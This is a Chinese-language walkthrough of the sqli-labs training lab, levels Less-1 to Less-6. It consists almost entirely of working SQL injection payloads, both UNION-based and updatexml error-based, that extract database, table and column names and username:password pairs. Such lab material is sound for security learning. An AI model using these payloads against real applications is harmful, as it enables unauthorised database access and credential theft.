一、靶场信息
sqli-labs下载:https://github.com/Audi-1/sqli-labs
phpstudy下载地址:http://down.php.cn/PhpStudy20180211.zip
我是在本地安装小皮搭建环境,相比于在服务器上搭建环境,更加简单
二、注入实操
Less-1
爆库名:http://127.0.0.1:100/Less-1/?id=-1' union select 1,2,database()--+
爆表名:?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+
爆列名:?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'--+
爆数据:?id=-1'union select 1,group_concat(username,0x3a,password),3 from users--+
Less-2
爆库名:?id=-1 union select 1,2,group_concat(schema_name) from information_schema.schemata --+
?id=-1 union select 1,2,database()--+
爆表名:?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' --+
爆列名:?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'--+
爆数据:?id=-1 union select 1,group_concat(username,0x3a,password),3 from users--+
Less-3
爆库名:?id=-1') union select 1,2,group_concat(schema_name) from information_schema.schemata --+
?id=-1') union select 1,2,database()--+
爆表名:?id=-1') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' --+
爆列名:?id=-1') union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'--+
爆数据:?id=-1') union select 1,group_concat(username,0x3a,password),3 from users--+
Less-4
爆库名:?id=-1") union select 1,2,group_concat(schema_name) from information_schema.schemata --+
?id=-1") union select 1,2,database()--+
爆表名:?id=-1") union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' --+
爆列名:?id=-1") union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'--+
爆数据:?id=-1") union select 1,group_concat(username,0x3a,password),3 from users--+
Less-5
爆库名:?id=1' and updatexml(1,concat(0x7e,database(), 0x7e),1)--+
爆表名:?id=1' and updatexml(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema='security'), 0x7e),1)--+
字符过长,显示不全,使用substr函数进行截取:
?id=1' and updatexml(1,concat(0x7e,substr((select group_concat(table_name)from information_schema.tables where table_schema='security'),1,32), 0x7e),1)--+
爆列名:?id=1' and updatexml(1,concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_schema='security' and table_name='users'), 0x7e),1)--+
爆数据:?id=1' and updatexml(1,concat(0x7e,(select group_concat(username,0x3a,password)from users),0x7e),1)--+
字符过长,显示不全,使用substr函数进行截取:
?id=1' and updatexml(1,concat(0x7e,substr((select group_concat(username,0x3a,password)from users),32,64),0x7e),1)--+
Less-6
爆库名:?id=1" and updatexml(1,concat(0x7e,database(),0x7e),1)--+
爆表名:?id=1" and updatexml(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema='security'), 0x7e),1)--+
爆列名:?id=1" and updatexml(1,concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_schema='security' and table_name='users'), 0x7e),1)--+
爆数据:?id=1" and updatexml(1,concat(0x7e,(select group_concat(username,0x3a,password)from users),0x7e),1)--+